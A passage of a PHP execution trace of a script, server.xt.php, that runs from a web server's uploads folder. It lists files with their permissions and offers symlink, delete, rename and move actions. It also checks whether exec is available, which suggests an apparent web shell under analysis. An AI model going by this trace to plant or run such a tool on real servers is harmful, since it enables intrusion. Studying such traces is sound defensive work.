'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 5 => ['filename' => 'server.xt.php', 'path' => '/var/www/html/uploads/server.xt.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes']]
4	204	0	0.011298	800040	column_title	1		/var/www/html/uploads/server.xt.php	1236	3	'filename'	'filename'	FALSE
5	205	0	0.011314	800040	urlencode	0		/var/www/html/uploads/server.xt.php	1416	1	'/var/www/html/uploads/'
5	205	1	0.011328	800136
5	205	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
4		A						/var/www/html/uploads/server.xt.php	1416	$d = 'dir=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F&amp;'
4		A						/var/www/html/uploads/server.xt.php	1418	$arr = ''
4		A						/var/www/html/uploads/server.xt.php	1421	$r = '&amp;reverse=true'
4		A						/var/www/html/uploads/server.xt.php	1422	$arr = ' &and;'
5	206	0	0.011392	800280	word	1		/var/www/html/uploads/server.xt.php	1429	1	'filename'
6	207	0	0.011405	800280	htmlentities	0		/var/www/html/uploads/server.xt.php	1599	3	'Filename'	2	'UTF-8'
6	207	1	0.011421	800552
6	207	R			'Filename'
5	206	1	0.011436	800440
5	206	R			'Filename'
4	204	1	0.011450	800040
4	208	0	0.011457	800040	column_title	1		/var/www/html/uploads/server.xt.php	1237	3	'size'	'filename'	FALSE
5	209	0	0.011473	800040	urlencode	0		/var/www/html/uploads/server.xt.php	1416	1	'/var/www/html/uploads/'
5	209	1	0.011486	800136
5	209	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
4		A						/var/www/html/uploads/server.xt.php	1416	$d = 'dir=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F&amp;'
4		A						/var/www/html/uploads/server.xt.php	1418	$arr = ''
4		A						/var/www/html/uploads/server.xt.php	1427	$r = ''
5	210	0	0.011534	800248	word	1		/var/www/html/uploads/server.xt.php	1429	1	'size'
6	211	0	0.011547	800248	htmlentities	0		/var/www/html/uploads/server.xt.php	1599	3	'Size'	2	'UTF-8'
6	211	1	0.011561	800520
6	211	R			'Size'
5	210	1	0.011574	800408
5	210	R			'Size'
4	208	1	0.011600	800152
4	212	0	0.011608	800152	column_title	1		/var/www/html/uploads/server.xt.php	1240	3	'permission'	'filename'	FALSE
5	213	0	0.011623	800152	urlencode	0		/var/www/html/uploads/server.xt.php	1416	1	'/var/www/html/uploads/'
5	213	1	0.011636	800248
5	213	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
4		A						/var/www/html/uploads/server.xt.php	1416	$d = 'dir=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F&amp;'
4		A						/var/www/html/uploads/server.xt.php	1418	$arr = ''
4		A						/var/www/html/uploads/server.xt.php	1427	$r = ''
5	214	0	0.011682	800392	word	1		/var/www/html/uploads/server.xt.php	1429	1	'permission'
6	215	0	0.011695	800392	htmlentities	0		/var/www/html/uploads/server.xt.php	1599	3	'Permission'	2	'UTF-8'
6	215	1	0.011711	800664
6	215	R			'Permission'
5	214	1	0.011725	800552
5	214	R			'Permission'
4	212	1	0.011739	800152
4	216	0	0.011746	800152	column_title	1		/var/www/html/uploads/server.xt.php	1241	3	'owner'	'filename'	FALSE
5	217	0	0.011813	800152	urlencode	0		/var/www/html/uploads/server.xt.php	1416	1	'/var/www/html/uploads/'
5	217	1	0.011827	800248
5	217	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
4		A						/var/www/html/uploads/server.xt.php	1416	$d = 'dir=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F&amp;'
4		A						/var/www/html/uploads/server.xt.php	1418	$arr = ''
4		A						/var/www/html/uploads/server.xt.php	1427	$r = ''
5	218	0	0.011874	800360	word	1		/var/www/html/uploads/server.xt.php	1429	1	'owner'
6	219	0	0.011887	800360	htmlentities	0		/var/www/html/uploads/server.xt.php	1599	3	'Owner'	2	'UTF-8'
6	219	1	0.011902	800632
6	219	R			'Owner'
5	218	1	0.011916	800520
5	218	R			'Owner'
4	216	1	0.011930	800152
4	220	0	0.011937	800152	column_title	1		/var/www/html/uploads/server.xt.php	1242	3	'group'	'filename'	FALSE
5	221	0	0.011952	800152	urlencode	0		/var/www/html/uploads/server.xt.php	1416	1	'/var/www/html/uploads/'
5	221	1	0.011965	800248
5	221	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
4		A						/var/www/html/uploads/server.xt.php	1416	$d = 'dir=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F&amp;'
4		A						/var/www/html/uploads/server.xt.php	1418	$arr = ''
4		A						/var/www/html/uploads/server.xt.php	1427	$r = ''
5	222	0	0.012010	800360	word	1		/var/www/html/uploads/server.xt.php	1429	1	'group'
6	223	0	0.012030	800360	htmlentities	0		/var/www/html/uploads/server.xt.php	1599	3	'Group'	2	'UTF-8'
6	223	1	0.012045	800632
6	223	R			'Group'
5	222	1	0.012058	800520
5	222	R			'Group'
4	220	1	0.012072	800152
4	224	0	0.012079	800152	word	1		/var/www/html/uploads/server.xt.php	1245	1	'functions'
5	225	0	0.012091	800152	htmlentities	0		/var/www/html/uploads/server.xt.php	1599	3	'Functions'	2	'UTF-8'
5	225	1	0.012105	800424
5	225	R			'Functions'
4	224	1	0.012119	800312
4	224	R			'Functions'
3		A						/var/www/html/uploads/server.xt.php	1249	$i = 0
4	226	0	0.012143	800152	sizeof	0		/var/www/html/uploads/server.xt.php	1249	1	[0 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253116, 'atime' => 1676253116, 'ctime' => 1676253116, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 3 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 5 => ['filename' => 'server.xt.php', 'path' => '/var/www/html/uploads/server.xt.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes']]
4	226	1	0.012215	800184
4	226	R			6
3		A						/var/www/html/uploads/server.xt.php	1250	$file = ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4	227	0	0.012256	800152	date	0		/var/www/html/uploads/server.xt.php	1252	2	'n/j/y H:i:s'	1676253117
4	227	1	0.012335	802544
4	227	R			'2/12/23 20:51:57'
3		A						/var/www/html/uploads/server.xt.php	1252	$timestamps = 'mtime: 2/12/23 20:51:57, '
4	228	0	0.012367	802272	date	0		/var/www/html/uploads/server.xt.php	1253	2	'n/j/y H:i:s'	1676253117
4	228	1	0.012398	802600
4	228	R			'2/12/23 20:51:57'
3		A						/var/www/html/uploads/server.xt.php	1253	$timestamps .= 'atime: 2/12/23 20:51:57, '
4	229	0	0.012425	802296	date	0		/var/www/html/uploads/server.xt.php	1254	2	'n/j/y H:i:s'	1676253117
4	229	1	0.012455	802624
4	229	R			'2/12/23 20:51:57'
3		A						/var/www/html/uploads/server.xt.php	1254	$timestamps .= 'ctime: 2/12/23 20:51:57'
4	230	0	0.012481	802520	html	1		/var/www/html/uploads/server.xt.php	1258	1	'mtime: 2/12/23 20:51:57, atime: 2/12/23 20:51:57, ctime: 2/12/23 20:51:57'
5	231	0	0.012496	802520	htmlentities	0		/var/www/html/uploads/server.xt.php	1594	3	'mtime: 2/12/23 20:51:57, atime: 2/12/23 20:51:57, ctime: 2/12/23 20:51:57'	2	NULL
5	231	1	0.012513	802824
5	231	R			'mtime: 2/12/23 20:51:57, atime: 2/12/23 20:51:57, ctime: 2/12/23 20:51:57'
4	230	1	0.012529	802712
4	230	R			'mtime: 2/12/23 20:51:57, atime: 2/12/23 20:51:57, ctime: 2/12/23 20:51:57'
4	232	0	0.012546	802384	urlencode	0		/var/www/html/uploads/server.xt.php	1281	1	'/var/www/html/uploads/.'
4	232	1	0.012560	802480
4	232	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads%2F.'
4	233	0	0.012576	802424	html	1		/var/www/html/uploads/server.xt.php	1281	1	'.'
5	234	0	0.012588	802424	htmlentities	0		/var/www/html/uploads/server.xt.php	1594	3	'.'	2	NULL
5	234	1	0.012602	802696
5	234	R			'.'
4	233	1	0.012615	802584
4	233	R			'.'
4	235	0	0.012629	802328	human_filesize	1		/var/www/html/uploads/server.xt.php	1304	1	4096
4		A						/var/www/html/uploads/server.xt.php	1153	$suffices = 'kMGTPE'
4		A						/var/www/html/uploads/server.xt.php	1155	$n = 0
4		A						/var/www/html/uploads/server.xt.php	1157	$filesize /= 1024
4		A						/var/www/html/uploads/server.xt.php	1158	$n++
5	236	0	0.012684	802328	strpos	0		/var/www/html/uploads/server.xt.php	1161	2	4	'.'
5	236	1	0.012698	802400
5	236	R			FALSE
5	237	0	0.012711	802328	round	0		/var/www/html/uploads/server.xt.php	1161	2	4	3
5	237	1	0.012724	802400
5	237	R			4
4		A						/var/www/html/uploads/server.xt.php	1161	$filesize = 4
5	238	0	0.012747	802328	strpos	0		/var/www/html/uploads/server.xt.php	1163	2	4	'.'
5	238	1	0.012760	802656
5	238	R			FALSE
5	239	0	0.012774	802328	substr	0		/var/www/html/uploads/server.xt.php	1169	3	'kMGTPE'	0	1
5	239	1	0.012789	802424
5	239	R			'k'
4		A						/var/www/html/uploads/server.xt.php	1169	$suffix = 'k'
4	235	1	0.012814	802360
4	235	R			'4 kB'
3		A						/var/www/html/uploads/server.xt.php	1304	$human = ' title="4 kB"'
4	240	0	0.012840	802368	decoct	0		/var/www/html/uploads/server.xt.php	1315	1	16895
4	240	1	0.012858	802440
4	240	R			'40777'
4	241	0	0.012872	802368	function_exists	0		/var/www/html/uploads/server.xt.php	1317	1	'posix_getuid'
4	241	1	0.012887	802408
4	241	R			TRUE
4	242	0	0.012899	802368	posix_getuid	0		/var/www/html/uploads/server.xt.php	1317	0
4	242	1	0.012912	802368
4	242	R			33
3		A						/var/www/html/uploads/server.xt.php	1317	$l = FALSE
4	243	0	0.012936	802368	permission_octal2string	1		/var/www/html/uploads/server.xt.php	1319	1	16895
4		A						/var/www/html/uploads/server.xt.php	970	$type = 'd'
4		A						/var/www/html/uploads/server.xt.php	979	$owner = 'r'
4		A						/var/www/html/uploads/server.xt.php	980	$owner .= 'w'
4		A						/var/www/html/uploads/server.xt.php	984	$owner .= 'x'
4		A						/var/www/html/uploads/server.xt.php	987	$group = 'r'
4		A						/var/www/html/uploads/server.xt.php	988	$group .= 'w'
4		A						/var/www/html/uploads/server.xt.php	992	$group .= 'x'
4		A						/var/www/html/uploads/server.xt.php	995	$other = 'r'
4		A						/var/www/html/uploads/server.xt.php	996	$other .= 'w'
4		A						/var/www/html/uploads/server.xt.php	1000	$other .= 'x'
4	243	1	0.013049	802408
4	243	R			'drwxrwxrwx'
4	244	0	0.013063	802408	html	1		/var/www/html/uploads/server.xt.php	1319	1	'drwxrwxrwx'
5	245	0	0.013077	802408	htmlentities	0		/var/www/html/uploads/server.xt.php	1594	3	'drwxrwxrwx'	2	NULL
5	245	1	0.013092	802680
5	245	R			'drwxrwxrwx'
4	244	1	0.013106	802568
4	244	R			'drwxrwxrwx'
4	246	0	0.013120	802368	array_key_exists	0		/var/www/html/uploads/server.xt.php	1324	2	'owner_name'	['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4	246	1	0.013150	802432
4	246	R			TRUE
4	247	0	0.013163	802368	array_key_exists	0		/var/www/html/uploads/server.xt.php	1330	2	'group_name'	['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4	247	1	0.013191	802432
4	247	R			TRUE
4	248	0	0.013206	802464	html	1		/var/www/html/uploads/server.xt.php	1339	1	'/var/www/html/uploads/.'
5	249	0	0.013219	802464	htmlentities	0		/var/www/html/uploads/server.xt.php	1594	3	'/var/www/html/uploads/.'	2	NULL
5	249	1	0.013234	802736
5	249	R			'/var/www/html/uploads/.'
4	248	1	0.013249	802624
4	248	R			'/var/www/html/uploads/.'
3		A						/var/www/html/uploads/server.xt.php	1342	$actions = []
4	250	0	0.013275	802368	function_exists	0		/var/www/html/uploads/server.xt.php	1343	1	'symlink'
4	250	1	0.013288	802408
4	250	R			TRUE
3		A						/var/www/html/uploads/server.xt.php	1344	$actions[] = 'create_symlink'
4	251	0	0.013313	802744	dirname	0		/var/www/html/uploads/server.xt.php	1346	1	'/var/www/html/uploads/.'
4	251	1	0.013326	802824
4	251	R			'/var/www/html/uploads'
4	252	0	0.013340	802792	is_writable	0		/var/www/html/uploads/server.xt.php	1346	1	'/var/www/html/uploads'
4	252	1	0.013362	802832
4	252	R			TRUE
3		A						/var/www/html/uploads/server.xt.php	1347	$actions[] = 'delete'
3		A						/var/www/html/uploads/server.xt.php	1348	$actions[] = 'rename'
3		A						/var/www/html/uploads/server.xt.php	1349	$actions[] = 'move'
4	253	0	0.013407	802744	function_exists	0		/var/www/html/uploads/server.xt.php	1356	1	'exec'
4	253	1	0.013420	802784
4	253	R			TRUE
4	254	0	0.013433	802744	sizeof	0		/var/www/html/uploads/server.xt.php	1360	1	[0 => 'create_symlink', 1 => 'delete', 2 => 'rename', 3 => 'move']
4	254	1	0.013449	802776
4	254	R			4
4	255	0	0.013462	802840	str_repeat	0		/var/www/html/uploads/server.xt.php	1363	2	'&nbsp;'	30
4	255	1	0.013476	803128
4	255	R			'&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'
4	256	0	0.013492	802808	word	1		/var/www/html/uploads/server.xt.php	1367	1	'create_symlink'
5	257	0	0.013506	802808	htmlentities	0		/var/www/html/uploads/server.xt.php	1599	3	'create symlink'	2	'UTF-8'
5	257	1	0.013521	803080
5	257	R			'create symlink'
4	256	1	0.013536	802968
4	256	R			'create symlink'
4	258	0	0.013551	802800	word	1		/var/www/html/uploads/server.xt.php	1367	1	'delete'
5	259	0	0.013576	802800	htmlentities	0		/var/www/html/uploads/server.xt.php	1599	3	'delete'	2	'UTF-8'
5	259	1	0.013591	803072
5	259	R			'delete'
4	258	1	0.013604	802960
4	258	R			'delete'
4	260	0	0.013618	802800	word	1		/var/www/html/uploads/server.xt.php	1367	1	'rename'
5	261	0	0.013631	802800	htmlentities	0		/var/www/html/uploads/server.xt.php	1599	3	'rename'	2	'UTF-8'
5	261	1	0.013645	803072
5	261	R			'rename'
4	260	1	0.013658	802960
4	260	R			'rename'
4	262	0	0.013672	802792	word	1		/var/www/html/uploads/server.xt.php	1367	1	'move'
5	263	0	0.013685	802792	htmlentities	0		/var/www/html/uploads/server.xt.php	1599	3	'move'	2	'UTF-8'
5	263	1	0.013699	803064
5	263	R			'move'
4	262	1	0.013712	802952
4	262	R			'move'
3		A						/var/www/html/uploads/server.xt.php	1249	$i++
4	264	0	0.013736	802744	sizeof	0		/var/www/html/uploads/server.xt.php	1249	1	[0 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253116, 'atime' => 1676253116, 'ctime' => 1676253116, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 3 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 5 => ['filename' => 'server.xt.php', 'path' => '/var/www/html/uploads/server.xt.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes']]
4	264	1	0.013808	802776
4	264	R			6
3		A						/var/www/html/uploads/server.xt.php	1250	$file = ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253116, 'atime' => 1676253116, 'ctime' => 1676253116, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4	265	0	0.013848	802744	date	0		/var/www/html/uploads/server.xt.php	1252	2	'n/j/y H:i:s'	1676253116
4	265	1	0.013879	803072
4	265	R			'2/12/23 20:51:56'
3		A						/var/www/html/uploads/server.xt.php	1252	$timestamps = 'mtime: 2/12/23 20:51:56, '
4	266	0	0.013906	802688	date	0		/var/www/html/uploads/server.xt.php	1253	2	'n/j/y H:i:s'	1676253116
4	266	1	0.013937	803016
4	266	R			'2/12/23 20:51:56'
3		A						/var/www/html/uploads/server.xt.php	1253	$timestamps .= 'atime: 2/12/23 20:51:56, '
4	267	0	0.013963	802712	date	0		/var/www/html/uploads/server.xt.php	1254	2	'n/j/y H:i:s'	1676253116
4	267	1	0.013993	803040
4	267	R			'2/12/23 20:51:56'
3		A						/var/www/html/uploads/server.xt.php	1254	$timestamps .= 'ctime: 2/12/23 20:51:56'
4	268	0	0.014019	802936	html	1		/var/www/html/uploads/server.xt.php	1258	1	'mtime: 2/12/23 20:51:56, atime: 2/12/23 20:51:56, ctime: 2/12/23 20:51:56'
5	269	0	0.014033	802936	htmlentities	0		/var/www/html/uploads/server.xt.php	1594	3	'mtime: 2/12/23 20:51:56, atime: 2/12/23 20:51:56, ctime: 2/12/23 20:51:56'	2	NULL
5	269	1	0.014050	803240
5	269	R			'mtime: 2/12/23 20:51:56, atime: 2/12/23 20:51:56, ctime: 2/12/23 20:51:56'
4	268	1	0.014066	803128
4	268	R			'mtime: 2/12/23 20:51:56, atime: 2/12/23 20:51:56, ctime: 2/12/23 20:51:56'
4	270	0	0.014082	802800	urlencode	0		/var/www/html/uploads/server.xt.php	1281	1	'/var/www/html/uploads/..'
4	270	1	0.014095	802896
4	270	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads%2F..'
4	271	0	0.014111	802840	html	1		/var/www/html/uploads/server.xt.php	1281	1	'..'
5	272	0	0.014123	802840	htmlentities	0		/var/www/html/uploads/server.xt.php	1594	3	'..'	2	NULL
5	272	1	0.014137	803112
5	272	R			'..'
4	271	1	0.014150	803000
4	271	R			'..'
4	273	0	0.014164	802744	human_filesize	1		/var/www/html/uploads/server.xt.php	1304	1	4096
4		A						/var/www/html/uploads/server.xt.php	1153	$suffices = 'kMGTPE'
4		A						/var/www/html/uploads/server.xt.php	1155	$n = 0
4		A						/var/www/html/uploads/server.xt.php	1157	$filesize /= 1024
4		A						/var/www/html/uploads/server.xt.php	1158	$n++
5	274	0	0.014218	802744	strpos	0		/var/www/html/uploads/server.xt.php	1161	2	4	'.'
5	274	1	0.014231	802816
5	274	R			FALSE
5	275	0	0.014244	802744	round	0		/var/www/html/uploads/server.xt.php	1161	2	4	3
5	275	1	0.014257	802816
5	275	R			4
4		A						/var/www/html/uploads/server.xt.php	1161	$filesize = 4
5	276	0	0.014280	802744	strpos	0		/var/www/html/uploads/server.xt.php	1163	2	4	'.'
5	276	1	0.014293	803072
5	276	R			FALSE
5	277	0	0.014306	802744	substr	0		/var/www/html/uploads/server.xt.php	1169	3	'kMGTPE'	0	1
5	277	1	0.014319	802840
5	277	R			'k'
4		A						/var/www/html/uploads/server.xt.php	1169	$suffix = 'k'
4	273	1	0.014346	802776
4	273	R			'4 kB'
3		A						/var/www/html/uploads/server.xt.php	1304	$human = ' title="4 kB"'
4	278	0	0.014372	802744	decoct	0		/var/www/html/uploads/server.xt.php	1315	1	16895
4	278	1	0.014384	802816
4	278	R			'40777'
4	279	0	0.014397	802744	function_exists	0		/var/www/html/uploads/server.xt.php	1317	1	'posix_getuid'
4	279	1	0.014411	802784
4	279	R			TRUE
4	280	0	0.014423	802744	posix_getuid	0		/var/www/html/uploads/server.xt.php	1317	0
4	280	1	0.014435	802744
4	280	R			33
3		A						/var/www/html/uploads/server.xt.php	1317	$l = FALSE
4	281	0	0.014458	802744	permission_octal2string	1		/var/www/html/uploads/server.xt.php	1319	1	16895
4		A						/var/www/html/uploads/server.xt.php	970	$type = 'd'
4		A						/var/www/html/uploads/server.xt.php	979	$owner = 'r'
4		A						/var/www/html/uploads/server.xt.php	980	$owner .= 'w'
4		A						/var/www/html/uploads/server.xt.php	984	$owner .= 'x'
4		A						/var/www/html/uploads/server.xt.php	987	$group = 'r'
4		A						/var/www/html/uploads/server.xt.php	988	$group .= 'w'
4		A						/var/www/html/uploads/server.xt.php	992	$group .= 'x'
4		A						/var/www/html/uploads/server.xt.php	995	$other = 'r'
4		A						/var/www/html/uploads/server.xt.php	996	$other .= 'w'
4		A						/var/www/html/uploads/server.xt.php	1000	$other .= 'x'
4	281	1	0.014570	802784
4	281	R			'drwxrwxrwx'
4	282	0	0.014584	802784	html	1		/var/www/html/uploads/server.xt.php	1319	1	'drwxrwxrwx'
5	283	0	0.014597	802784	htmlentities	0		/var/www/html/uploads/server.xt.php	1594	3	'drwxrwxrwx'	2	NULL
5	283	1	0.014612	803056
5	283	R			'drwxrwxrwx'
4	282	1	0.014626	802944
4	282	R			'drwxrwxrwx'
4	284	0	0.014639	802744	array_key_exists	0		/var/www/html/uploads/server.xt.php	1324	2	'owner_name'	['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253116, 'atime' => 1676253116, 'ctime' => 1676253116, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4	284	1	0.014669	802808
4	284	R			TRUE
4	285	0	0.014682	802744	array_key_exists	0		/var/www/html/uploads/server.xt.php	1330	2	'group_name'	['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253116, 'atime' => 1676253116, 'ctime' => 1676253116, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4	285	1	0.014710	802808
4	285	R			TRUE
4	286	0	0.014724	802840	html	1		/var/www/html/uploads/server.xt.php	1339	1	'/var/www/html/uploads/..'
5	287	0	0.014737	802840	htmlentities	0		/var/www/html/uploads/server.xt.php	1594	3	'/var/www/html/uploads/..'	2	NULL
5	287	1	0.014752	803112
5	287	R			'/var/www/html/uploads/..'
4	286	1	0.014766	803000
4	286	R			'/var/www/html/uploads/..'
3		A						/var/www/html/uploads/server.xt.php	1342	$actions = []
4	288	0	0.014791	802368	function_exists	0		/var/www/html/uploads/server.xt.php	1343	1	'symlink'
4	288	1	0.014805	802408
4	288	R			TRUE
3		A						/var/www/html/uploads/server.xt.php	1344	$actions[] = 'create_symlink'
4	289	0	0.014829	802744	dirname	0		/var/www/html/uploads/server.xt.php	1346	1	'/var/www/html/uploads/..'
4	289	1	0.014842	802832
4	289	R			'/var/www/html/uploads'
4	290	0	0.014856	802800	is_writable	0		/var/www/html/uploads/server.xt.php	1346	1	'/var/www/html/uploads'
4	290	1	0.014873	802840
4	290	R			TRUE
3		A						/var/www/html/uploads/server.xt.php	1347	$actions[] = 'delete'
3		A						/var/www/html/uploads/server.xt.php	1348	$actions[] = 'rename'
3		A						/var/www/html/uploads/server.xt.php	1349	$actions[] = 'move'
4	291	0	0.014918	802744	function_exists	0		/var/www/html/uploads/server.xt.php	1356	1	'exec'
4	291	1	0.014931	802784
4	291	R			TRUE
4	292	0	0.014944	802744	sizeof	0		/var/www/html/uploads/server.xt.php	1360	1	[0 => 'create_symlink', 1 => 'delete', 2 => 'rename', 3 => 'move']
4	292	1	0.014961	802776
4	292	R			4
4	293	0	0.014973	802840	str_repeat	0		/var/www/html/uploads/server.xt.php	1363	2	'&nbsp;'	30
4	293	1	0.014987	803128
